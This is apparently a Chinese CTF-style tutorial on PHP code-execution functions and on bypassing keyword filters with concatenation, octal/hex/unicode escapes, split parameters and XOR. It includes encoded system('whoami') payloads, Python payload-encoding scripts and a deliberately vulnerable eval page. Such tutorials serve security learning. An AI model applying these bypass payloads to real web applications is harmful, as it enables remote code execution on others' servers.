代码执行函数
首先来看看在PHP中有哪些函数有代码执行的功能
eval()
最常见的代码执行函数,把字符串 code 作为PHP代码执行。
eval ( string $code ) : mixed
assert()
检查一个断言是否为false
PHP 5
assert ( mixed $assertion [, string $description ] ) : bool
PHP 7
assert ( mixed $assertion [, Throwable $exception ] ) : bool
assert()会检查指定的assertion并在结果为false时采取适当的行动。在PHP5或PHP7中,如果assertion是字符串,它将会被assert()当做PHP代码来执行。
preg_replace()+/e
执行一个正则表达式的搜索和替换
preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) : mixed
搜索subject中匹配pattern的部分,以replacement进行替换。如果pattern的模式修饰符使用/e,那么当subject被匹配成功时,replacement会被当做PHP代码执行
PS:
preg_replace()+函数的/e修饰符在PHP7中被移除
create_function()
创建一个匿名(lambda样式)函数
create_function ( string $args , string $code ) : string
根据传递的参数创建一个匿名函数,并为其返回唯一的名称。如果没有严格对参数传递进行过滤,攻击者可以构造payload传递给create_function()对参数或函数体闭合注入恶意代码导致代码执行
可回调函数
array_map()
为数组的每个元素应用回调函数
array_map ( callable $callback , array $array , array ...$arrays ) : array
返回数组,是为array每个元素应用callback函数之后的数组。 array_map()返回一个array,数组内容为array1的元素按索引顺序为参数调用callback后的结果(有更多数组时,还会传入arrays的元素)。 callback函数形参的数量必须匹配array_map()实参中数组的数量。
call_user_func()
把第一个参数作为回调函数调用
call_user_func ( callable $callback [, mixed $parameter [, mixed $... ]] ) : mixed
第一个参数callback是被调用的回调函数,其余参数是回调函数的参数。
call_user_func_array()
调用回调函数,并把一个数组参数作为回调函数的参数
call_user_func_array ( callable $callback , array $param\_arr ) : mixed
把第一个参数作为回调函数callback调用,把参数数组作param_arr为回调函数的的参数传入。跟array_map()相似
array_filter()
用回调函数过滤数组中的单元
array_filter ( array $array [, callable $callback [, int $flag = 0 ]] ) : array
依次将array数组中的每个值传递到callback函数。如果callback函数返回true,则array数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。
usort()
使用用户自定义的比较函数对数组中的值进行排序
usort ( array &$array , callable $value\_compare\_func ) : bool
本函数将用用户自定义的比较函数对一个数组中的值进行排序。 如果要排序的数组需要用一种不寻常的标准进行排序,那么应该使用此函数。
当PHP < 5.6时
当PHP >= 5.6 & PHP < 7时,php有一个参数变长特性
等等还有很多函数参数是可回调的,就不一一列举了。
接下来根据各种过滤情况来看看具体的一些绕过方法
字符串拼接绕过
字符串拼接绕过适用于绕过过滤具体关键字的限制
适用PHP版本:
PHP>=7
Payload:
(p.h.p.i.n.f.o)();
(sy.(st).em)(whoami);
(sy.(st).em)(who.ami);
(s.y.s.t.e.m)("whoami");
.......
在PHP中不一定需要
引号(单引号/双引号)来表示字符串。PHP支持我们声明元素的类型,比如$name = (string)mochu7;,在这种情况下,$name就包含字符串"mochu7",此外,如果不显示声明类型,那么PHP会将圆括号内的数据当成字符串来处理
字符串转义绕过
适用PHP版本:
PHP>=7
以八进制表示的\[0–7]{1,3}转义字符会自动适配byte(如"\400" == “\000”)
以十六进制的\x[0–9A-Fa-f]{1,2}转义字符表示法(如“\x41")
以Unicode表示的\u{[0–9A-Fa-f]+}字符,会输出为UTF-8字符串
注意这里转义后的字符必须双引号包裹传参
Payload处理脚本如下:
# -\*- coding:utf-8 -\*-
def hex\_payload(payload):
res_payload = ''
for i in payload:
i = "\\x" + hex(ord(i))[2:]
res_payload += i
print("[+]'{}' Convert to hex: \"{}\"".format(payload,res_payload))
def oct\_payload(payload):
res_payload = ""
for i in payload:
i = "\\" + oct(ord(i))[2:]
res_payload += i
print("[+]'{}' Convert to oct: \"{}\"".format(payload,res_payload))
def uni\_payload(payload):
res_payload = ""
for i in payload:
i = "\\u{{{0}}}".format(hex(ord(i))[2:])
res_payload += i
print("[+]'{}' Convert to unicode: \"{}\"".format(payload,res_payload))
if __name__ == '\_\_main\_\_':
payload = 'phpinfo'
hex_payload(payload)
oct_payload(payload)
uni_payload(payload)
Payload
"\x70\x68\x70\x69\x6e\x66\x6f"();#phpinfo();
"\163\171\163\164\145\155"('whoami');#system('whoami');
"\u{73}\u{79}\u{73}\u{74}\u{65}\u{6d}"('id');#system('whoami');
"\163\171\163\164\145\155"("\167\150\157\141\155\151");#system('whoami');
.......
另外,八进制的方法可以绕过无字母传参进行代码执行
"\163\171\163\164\145\155"("\167\150\157\141\155\151");#system('whoami');
多次传参绕过
适用PHP版本:
无限制
如果过滤了引号(单引号/双引号),可以通过以下方法绕过
GET:
?1=system&2=whoami
POST:
cmd=$\_GET[1]($\_GET[2]);
cmd=$\_POST[1]($\_POST[2]);&1=system&2=whoami
如果PHP版本大于7这里还可以用拼接的方法绕过过滤引号
(sy.st.em)(whoami);
另外如果碰到参数长度受限制,也可以通过多次传参的方法绕过参数长度限制或者回调函数
回调函数可能大部分看限制的具体长度,但是在PHP >= 5.6 & PHP < 7时对以上过滤方法可以绕过
内置函数访问绕过
适用于PHP版本:Windows本地测试的是
PHP>=7可以成功,PHP5测试虽然报错但是并不肯定不能使用
get_defined_functions():返回所有已定义函数的数组
利用这种方法首先还需要知道PHP的具体版本,因为每个版本的get_defined_functions()返回的值都是不一样的,这里以php7.4.3为准
异或绕过
适用PHP版本:
无限制
在PHP中两个字符串异或之后,得到的还是一个字符串。
例如:我们异或 ? 和 ~ 之后得到的是 A
字符:? ASCII码:63 二进制: 0011 1111
字符:~ ASCII码:126 二进制: 0111 1110
异或规则:
1 XOR 0 = 1
0 XOR 1 = 1
0 XOR 0 = 0
1 XOR 1 = 0
上述两个字符异或得到 二进制: 0100 0001
该二进制的十进制也就是:65
对应的ASCII码是:A
接下来看一道例题:
<?php
highlight\_file(\_\_FILE\_\_);
error\_reporting(0);
if(preg\_match('/[a-z0-9]/is', $\_GET['shell'])){
echo "hacker!!";
}else{
eval($\_GET['shell']);
}
?>
过滤了所有英文字母和数字,但是我们知道ASCII码中还有很多字母数字之外的字符,利用这些字符进行异或可以得到我们想要的字符
PS:取ASCII表种非字母数字的其他字符,要注意有些字符可能会影响整个语句执行,所以要去掉如:反引号,单引号
脚本如下:
# -\*- coding: utf-8 -\*-
payload = "assert"
strlist = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 35, 36, 37, 38, 40, 41, 42, 43, 44, 45, 46, 47, 58, 59, 60, 61, 62, 63, 64, 91, 93, 94, 95, 96, 123, 124, 125, 126, 127]
#strlist是ascii表中所有非字母数字的字符十进制
str1,str2 = '',''
for char in payload:
for i in strlist:
for j in strlist:
if(i ^ j == ord(char)):
i = '%{:0>2}'.format(hex(i)[2:])
j = '%{:0>2}'.format(hex(j)[2:])
print("('{0}'^'{1}')".format(i,j),end=".")
break
else:
continue
break
